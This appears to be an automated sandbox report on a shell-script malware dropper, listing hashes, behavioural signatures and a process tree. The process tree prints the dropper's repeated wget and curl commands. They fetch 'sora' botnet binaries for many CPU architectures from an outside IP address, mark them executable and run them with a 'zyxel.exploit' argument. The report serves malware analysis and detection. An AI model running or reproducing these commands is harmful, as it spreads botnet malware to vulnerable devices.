Analysis
-
max time kernel
25s -
max time network
23s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
18/10/2024, 03:03
Static task
static1
Behavioral task
behavioral1
Sample
ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh
-
Size
2KB
-
MD5
eb7a4e59f642cd5475876f6ef1a09d3a
-
SHA1
9232db0ebfe888067cc85a32b786a7ce41be0a6f
-
SHA256
ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670
-
SHA512
9393df90cc409e4f6ee6a2fc7df960123823ca22c25f01ae4e2ab094f74f71f0565925aa0384a5e84f4b15792d89317af71b1f223fa7fdd340b4404f9a25c6b8
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 784 chmod 851 chmod 907 chmod 871 chmod 877 chmod 766 chmod 801 chmod 865 chmod 772 chmod 778 chmod 818 chmod 832 chmod 859 chmod 892 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/robben 767 robben /tmp/robben 773 robben /tmp/robben 779 robben /tmp/robben 786 robben /tmp/robben 803 robben /tmp/robben 819 robben /tmp/robben 833 robben /tmp/robben 852 robben /tmp/robben 860 robben /tmp/robben 866 robben /tmp/robben 872 robben /tmp/robben 878 robben /tmp/robben 894 robben /tmp/robben 908 robben -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 769 wget 770 curl 771 cat -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/robben ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh
Processes
-
/tmp/ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh/tmp/ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh1⤵
- Writes file to tmp directory
PID:735 -
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x862⤵PID:739
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x862⤵
- Reads runtime system information
PID:748
-
-
/bin/catcat sora.x862⤵PID:765
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-cd63d15926f547aaa950d31ec9a8056f-systemd-timedated.service-JtxiuP2⤵
- File and Directory Permissions Modification
PID:766
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:767
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mips2⤵
- System Network Configuration Discovery
PID:769
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:770
-
-
/bin/catcat sora.mips2⤵
- System Network Configuration Discovery
PID:771
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-cd63d15926f547aaa950d31ec9a8056f-systemd-timedated.service-JtxiuP2⤵
- File and Directory Permissions Modification
PID:772
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:773
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x86_642⤵PID:775
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x86_642⤵
- Reads runtime system information
PID:776
-
-
/bin/catcat sora.x86_642⤵PID:777
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-cd63d15926f547aaa950d31ec9a8056f-systemd-timedated.service-JtxiuP2⤵
- File and Directory Permissions Modification
PID:778
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:779
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i4682⤵PID:781
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i4682⤵
- Reads runtime system information
PID:782
-
-
/bin/catcat sora.i4682⤵PID:783
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-cd63d15926f547aaa950d31ec9a8056f-systemd-timedated.service-JtxiuP2⤵
- File and Directory Permissions Modification
PID:784
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:786
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i6862⤵PID:789
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i6862⤵
- Reads runtime system information
PID:792
-
-
/bin/catcat sora.i6862⤵PID:799
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-cd63d15926f547aaa950d31ec9a8056f-systemd-timedated.service-JtxiuP2⤵
- File and Directory Permissions Modification
PID:801
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:803
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mpsl2⤵PID:805
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mpsl2⤵
- Reads runtime system information
PID:808
-
-
/bin/catcat sora.mpsl2⤵PID:815
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-cd63d15926f547aaa950d31ec9a8056f-systemd-timedated.service-JtxiuP2⤵
- File and Directory Permissions Modification
PID:818
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:819
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm42⤵PID:821
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm42⤵
- Reads runtime system information
PID:825
-
-
/bin/catcat sora.arm42⤵PID:829
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-cd63d15926f547aaa950d31ec9a8056f-systemd-timedated.service-JtxiuP2⤵
- File and Directory Permissions Modification
PID:832
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:833
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm52⤵PID:836
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm52⤵
- Reads runtime system information
PID:839
-
-
/bin/catcat sora.arm52⤵PID:849
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-cd63d15926f547aaa950d31ec9a8056f-systemd-timedated.service-JtxiuP2⤵
- File and Directory Permissions Modification
PID:851
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:852
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm62⤵PID:854
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm62⤵
- Reads runtime system information
PID:856
-
-
/bin/catcat sora.arm62⤵PID:858
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-cd63d15926f547aaa950d31ec9a8056f-systemd-timedated.service-JtxiuP2⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:860
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm72⤵PID:862
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm72⤵
- Reads runtime system information
PID:863
-
-
/bin/catcat sora.arm72⤵PID:864
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-cd63d15926f547aaa950d31ec9a8056f-systemd-timedated.service-JtxiuP2⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:866
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc2⤵PID:868
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc2⤵
- Reads runtime system information
PID:869
-
-
/bin/catcat sora.ppc2⤵PID:870
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-cd63d15926f547aaa950d31ec9a8056f-systemd-timedated.service-JtxiuP2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:872
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc440fp2⤵PID:874
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc440fp2⤵
- Reads runtime system information
PID:875
-
-
/bin/catcat sora.ppc440fp2⤵PID:876
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-cd63d15926f547aaa950d31ec9a8056f-systemd-timedated.service-JtxiuP2⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:878
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.m68k2⤵PID:880
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.m68k2⤵
- Reads runtime system information
PID:883
-
-
/bin/catcat sora.m68k2⤵PID:890
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-cd63d15926f547aaa950d31ec9a8056f-systemd-timedated.service-JtxiuP2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:894
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.sh42⤵PID:896
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.sh42⤵
- Reads runtime system information
PID:899
-
-
/bin/catcat sora.sh42⤵PID:905
-
-
/bin/chmodchmod +x ee5dc088769cd015612163e69ba1303ea2b9e39c8f1f942d2776a397b6b09670.sh robben systemd-private-cd63d15926f547aaa950d31ec9a8056f-systemd-timedated.service-JtxiuP2⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/robben./robben zyxel.exploit2⤵
- Executes dropped EXE
PID:908
-